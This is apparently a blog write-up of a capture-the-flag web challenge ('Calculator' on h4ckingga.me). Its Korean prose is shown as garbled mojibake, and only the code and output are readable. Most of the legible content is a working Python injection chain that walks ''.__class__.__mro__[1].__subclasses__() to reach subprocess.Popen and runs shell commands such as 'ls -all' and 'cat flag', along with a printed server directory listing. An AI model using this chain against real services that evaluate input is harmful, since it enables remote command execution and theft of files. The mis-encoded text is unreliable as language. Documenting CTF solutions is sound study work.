์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐ŸŽˆ DefCoN

[h4ckingga.me] Web Hacking - Calculator *๊ตฌ์กฐ ๊ณต๋ถ€ SSTI ๊ณต๋ถ€

  • -
๋ฐ˜์‘ํ˜•

์Šต๊ด€์ ์œผ๋กœ ์†Œ์Šค์ฝ”๋“œ ๋จผ์ € ํ™•์ธํ•˜๊ธฐ

fake flag ๋ณด๊ณ  ์—๋ผ์ด ํ•˜๊ณ  ๋‹ค์‹œ ๊ณต๊ฒฉ ์‹œ๋„

โ€‹

'a' 'a' ์ž…๋ ฅ์‹œ aa ์ถœ๋ ฅ ํ™•์ธ > Python or Java

True + True ์ž…๋ ฅ ์‹œ 2 ์ถœ๋ ฅ ํ™•์ธ > Python ํ™•์ธ

โ€‹

''.__class__.__mro__[1].__subclasses__()

ํ•ด๋‹น ์ฝ”๋“œ๋ฅผ ํ†ตํ•ด

subproccess.Popen ์œ„์น˜ ์ฐพ๊ธฐ

โ€‹

''.__class__.__mro__[1].__subclasses__()[popen์œ„์น˜]('popen ๋ช…๋ น์–ด',shell=True,stdout=-1).communicate()

ํ•ด๋‹น ๋ช…๋ น์–ด ์‚ฌ์šฉ

โ€‹

โ€‹

''.__class__.__mro__[1].__subclasses__()[213]('ls -all',shell=True,stdout=-1).communicate()

โ€‹

total 28\ndrwxr-sr-x 1 root app 4096 Aug 8 2021 .\

ndrwxr-xr-x 1 root root 4096 Aug 8 2021 ..\

n-rwxrw-rw- 1 root root 243 Aug 4 2021 Dockerfile\

n-rwxrw-rw- 1 root root 983 Aug 2 2021 app.py\

n-rwxrw-rw- 1 root root 32 Aug 4 2021 flag\

ndrwxrwxrwx 2 root root 4096 Aug 8 2021 templates\n

โ€‹

flag ํ™•์ธ ํ›„ ํ’€์ด ์™„๋ฃŒ

''.__class__.__mro__[1].__subclasses__()[213]('cat flag',shell=True,stdout=-1).communicate()

โ€‹

โ€‹

 

์ฐธ๊ณ 

๋ฐ˜์‘ํ˜•

'๐ŸŽˆ DefCoN' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[h4ckingga.me] Cryptography - Hello,Postman  (0) 2023.05.31
DefCoN #21 - 8  (0) 2022.06.10
DefCoN #21 - 7  (0) 2022.06.10
DefCoN #21 - 6  (0) 2022.06.10
DefCoN #21 - 5  (0) 2022.06.10
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.